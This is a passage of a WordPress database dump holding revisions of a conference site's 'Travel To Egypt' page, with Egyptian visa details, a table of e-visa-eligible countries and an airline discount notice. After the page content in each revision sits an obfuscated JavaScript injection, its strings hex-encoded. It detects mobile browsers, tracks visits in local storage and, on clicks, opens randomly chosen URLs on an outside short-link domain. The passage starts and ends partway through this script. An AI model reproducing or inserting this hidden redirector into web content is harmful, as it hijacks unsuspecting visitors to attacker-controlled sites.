Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Travel To Egypt','','inherit','closed','closed','','2675-revision-v1','','','2023-05-27 04:53:44','2023-05-27 04:53:44','',2675,'https://gsw2023.com/?p=4589',0,'revision','',0),
(4590,1,'2023-05-27 04:56:39','2023-05-27 04:56:39','<p>[vc_row][vc_column][vc_column_text]</p>\n<p style=\"font-weight: 400;\"><strong>Entry Visa:</strong></p>\n<ul style=\"font-weight: 400;\">\n<li>For participants require visa invitation letters, please send an email request to:</li>\n</ul>\n<p style=\"font-weight: 400;\"><strong><span style=\"color: #808080;\"><a style=\"color: #808080;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span>  You will receive an a letter automatically once you provide your name (as it appears in your passport) and passport number</strong></p>\n<ul style=\"font-weight: 400;\">\n<li>For most nationalities, reciving a visa for Egypt can be done on arrival at Cairo International Airport or online via the Egyptian Government\'s official e-visa portal <span style=\"color: #808080;\"><strong>(<a style=\"color: #808080;\" href=\"https://visa2egypt.gov.eg/eVisa/Home?VISTK=OA4K-0JST-POSC-FLL7-FEVD-OUJ5-QIZH-78YZ-GYQ9-9IQQ-K5BB-E03R-EOBW-KVT6-S9CK-X3W9\" data-saferedirecturl=\"https://www.google.com/url?q=https://visa2egypt.gov.eg/eVisa/Home?VISTK%3DOA4K-0JST-POSC-FLL7-FEVD-OUJ5-QIZH-78YZ-GYQ9-9IQQ-K5BB-E03R-EOBW-KVT6-S9CK-X3W9&amp;source=gmail&amp;ust=1685249456207000&amp;usg=AOvVaw3sDw0ljxu0W2nRhsTa3oTm\">https://visa2egypt.gov.eg/eVisa/Home?VISTK=OA4K-0JST-POSC-FLL7-FEVD-OUJ5-QIZH-78YZ-GYQ9-9IQQ-K5BB-E03R-EOBW-KVT6-S9CK-X3W9</a>)</strong></span>. Nationals of the countries listed below may be issued with an e-Visa upon application on the Egypt e-Visa Portal</li>\n</ul>\n<p style=\"font-weight: 400;\"><strong> </strong></p>\n<table style=\"font-weight: 400;\" width=\"1088\">\n<tbody>\n<tr>\n<td>Albania</td>\n<td>Argentina</td>\n<td>Armenia</td>\n<td>Australia</td>\n</tr>\n<tr>\n<td>Austria</td>\n<td>Azerbaijan</td>\n<td>Bahrain</td>\n<td>Belarus</td>\n</tr>\n<tr>\n<td>Belgium</td>\n<td>Bolivia</td>\n<td>Bosnia and Herzegovina</td>\n<td>Brazil</td>\n</tr>\n<tr>\n<td>Bulgaria</td>\n<td>Canada</td>\n<td>Chile</td>\n<td>China</td>\n</tr>\n<tr>\n<td>China/Hong Kong</td>\n<td>China/Taiwan</td>\n<td>Colombia</td>\n<td>Croatia</td>\n</tr>\n<tr>\n<td>Cyprus</td>\n<td>Czech</td>\n<td>Denmark</td>\n<td>Ecuador</td>\n</tr>\n<tr>\n<td>Estonia</td>\n<td>Finland</td>\n<td>France</td>\n<td>Georgia</td>\n</tr>\n<tr>\n<td>Germany</td>\n<td>Greece</td>\n<td>Hungary</td>\n<td>Iceland</td>\n</tr>\n<tr>\n<td>India</td>\n<td>Ireland</td>\n<td>Italy</td>\n<td>Japan</td>\n</tr>\n<tr>\n<td>Kazakhstan</td>\n<td>Korea (South)</td>\n<td>Kuwait</td>\n<td>Latvia</td>\n</tr>\n<tr>\n<td>Lithuania</td>\n<td>Luxembourg</td>\n<td>Macedonia</td>\n<td>Malaysia</td>\n</tr>\n<tr>\n<td>Malta</td>\n<td>Mexico</td>\n<td>Moldova</td>\n<td>Monaco</td>\n</tr>\n<tr>\n<td>Montenegro</td>\n<td>Netherlands</td>\n<td>New Zealand</td>\n<td>Norway</td>\n</tr>\n<tr>\n<td>Oman</td>\n<td>Paraguay</td>\n<td>Peru</td>\n<td>Poland</td>\n</tr>\n<tr>\n<td>Portugal</td>\n<td>Qatar</td>\n<td>Republic of Kosovo</td>\n<td>Romania</td>\n</tr>\n<tr>\n<td>Russian Federation</td>\n<td>San Marino</td>\n<td>Saudi Arabia</td>\n<td>Serbia</td>\n</tr>\n<tr>\n<td>Singapore</td>\n<td>Slovakia</td>\n<td>Slovenia</td>\n<td>South Africa</td>\n</tr>\n<tr>\n<td>Spain</td>\n<td>Sweden</td>\n<td>Switzerland</td>\n<td>Ukraine</td>\n</tr>\n<tr>\n<td>United Arab Emirates</td>\n<td>United Kingdom (England, Northern Ireland, Scotland and Wales)</td>\n<td>United States of America</td>\n<td>Uruguay</td>\n</tr>\n<tr>\n<td>Vatican</td>\n<td>Venezuela</td>\n<td></td>\n<td>&nbsp;</td>\n</tr>\n</tbody>\n</table>\n<p style=\"font-weight: 400;\"><strong> </strong></p>\n<ul style=\"font-weight: 400;\">\n<li>Weather: in September: Around 25-30 degree in Cairo</li>\n<li>Cairo is reachable from over 70 countries through Egypt Air and Star Alliance members. The local organizing committee arranged for additional discount on air tickets from Egypt Air (Star Alliance). Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to: <strong><span style=\"color: #808080;\"><a style=\"color: #808080;\" href=\"mailto:GSW-EGYPTAIR@gsw2023.com\">GSW-EGYPTAIR@gsw2023.com</a></span></strong></li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Travel To Egypt','','inherit','closed','closed','','2675-revision-v1','','','2023-05-27 04:56:39','2023-05-27 04:56:39','',2675,'https://gsw2023.com/?p=4590',0,'revision','',0),
(4591,1,'2023-05-27 08:26:43','2023-05-27 08:26:43','<p>[vc_row][vc_column][vc_column_text]</p>\n<p style=\"font-weight: 400;\"><strong>Entry Visa:</strong></p>\n<ul style=\"font-weight: 400;\">\n<li>For participants require visa invitation letters, please send an email request to:</li>\n</ul>\n<p style=\"font-weight: 400;\"><strong><span style=\"color: #808080;\"><a style=\"color: #808080;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span>  You will receive an a letter automatically once you provide your name (as it appears in your passport) ,passport number and Nationality.</strong></p>\n<ul style=\"font-weight: 400;\">\n<li>For most nationalities, reciving a visa for Egypt can be done on arrival at Cairo International Airport or online via the Egyptian Government\'s official e-visa portal <span style=\"color: #808080;\"><strong>(<a style=\"color: #808080;\" href=\"https://visa2egypt.gov.eg/eVisa/Home?VISTK=OA4K-0JST-POSC-FLL7-FEVD-OUJ5-QIZH-78YZ-GYQ9-9IQQ-K5BB-E03R-EOBW-KVT6-S9CK-X3W9\" data-saferedirecturl=\"https://www.google.com/url?q=https://visa2egypt.gov.eg/eVisa/Home?VISTK%3DOA4K-0JST-POSC-FLL7-FEVD-OUJ5-QIZH-78YZ-GYQ9-9IQQ-K5BB-E03R-EOBW-KVT6-S9CK-X3W9&amp;source=gmail&amp;ust=1685249456207000&amp;usg=AOvVaw3sDw0ljxu0W2nRhsTa3oTm\">https://visa2egypt.gov.eg/eVisa/Home?VISTK=OA4K-0JST-POSC-FLL7-FEVD-OUJ5-QIZH-78YZ-GYQ9-9IQQ-K5BB-E03R-EOBW-KVT6-S9CK-X3W9</a>)</strong></span>. Nationals of the countries listed below may be issued with an e-Visa upon application on the Egypt e-Visa Portal</li>\n</ul>\n<p style=\"font-weight: 400;\"><strong> </strong></p>\n<table style=\"font-weight: 400;\" width=\"1088\">\n<tbody>\n<tr>\n<td>Albania</td>\n<td>Argentina</td>\n<td>Armenia</td>\n<td>Australia</td>\n</tr>\n<tr>\n<td>Austria</td>\n<td>Azerbaijan</td>\n<td>Bahrain</td>\n<td>Belarus</td>\n</tr>\n<tr>\n<td>Belgium</td>\n<td>Bolivia</td>\n<td>Bosnia and Herzegovina</td>\n<td>Brazil</td>\n</tr>\n<tr>\n<td>Bulgaria</td>\n<td>Canada</td>\n<td>Chile</td>\n<td>China</td>\n</tr>\n<tr>\n<td>China/Hong Kong</td>\n<td>China/Taiwan</td>\n<td>Colombia</td>\n<td>Croatia</td>\n</tr>\n<tr>\n<td>Cyprus</td>\n<td>Czech</td>\n<td>Denmark</td>\n<td>Ecuador</td>\n</tr>\n<tr>\n<td>Estonia</td>\n<td>Finland</td>\n<td>France</td>\n<td>Georgia</td>\n</tr>\n<tr>\n<td>Germany</td>\n<td>Greece</td>\n<td>Hungary</td>\n<td>Iceland</td>\n</tr>\n<tr>\n<td>India</td>\n<td>Ireland</td>\n<td>Italy</td>\n<td>Japan</td>\n</tr>\n<tr>\n<td>Kazakhstan</td>\n<td>Korea (South)</td>\n<td>Kuwait</td>\n<td>Latvia</td>\n</tr>\n<tr>\n<td>Lithuania</td>\n<td>Luxembourg</td>\n<td>Macedonia</td>\n<td>Malaysia</td>\n</tr>\n<tr>\n<td>Malta</td>\n<td>Mexico</td>\n<td>Moldova</td>\n<td>Monaco</td>\n</tr>\n<tr>\n<td>Montenegro</td>\n<td>Netherlands</td>\n<td>New Zealand</td>\n<td>Norway</td>\n</tr>\n<tr>\n<td>Oman</td>\n<td>Paraguay</td>\n<td>Peru</td>\n<td>Poland</td>\n</tr>\n<tr>\n<td>Portugal</td>\n<td>Qatar</td>\n<td>Republic of Kosovo</td>\n<td>Romania</td>\n</tr>\n<tr>\n<td>Russian Federation</td>\n<td>San Marino</td>\n<td>Saudi Arabia</td>\n<td>Serbia</td>\n</tr>\n<tr>\n<td>Singapore</td>\n<td>Slovakia</td>\n<td>Slovenia</td>\n<td>South Africa</td>\n</tr>\n<tr>\n<td>Spain</td>\n<td>Sweden</td>\n<td>Switzerland</td>\n<td>Ukraine</td>\n</tr>\n<tr>\n<td>United Arab Emirates</td>\n<td>United Kingdom (England, Northern Ireland, Scotland and Wales)</td>\n<td>United States of America</td>\n<td>Uruguay</td>\n</tr>\n<tr>\n<td>Vatican</td>\n<td>Venezuela</td>\n<td></td>\n<td></td>\n</tr>\n</tbody>\n</table>\n<p style=\"font-weight: 400;\"><strong> </strong></p>\n<ul style=\"font-weight: 400;\">\n<li>Weather: in September: Around 25-30 degree in Cairo</li>\n<li>Cairo is reachable from over 70 countries through Egypt Air and Star Alliance members. The local organizing committee arranged for additional discount on air tickets from Egypt Air (Star Alliance). Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to: <strong><span style=\"color: #808080;\"><a style=\"color: #808080;\" href=\"mailto:GSW-EGYPTAIR@gsw2023.com\">GSW-EGYPTAIR@gsw2023.com</a></span></strong></li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 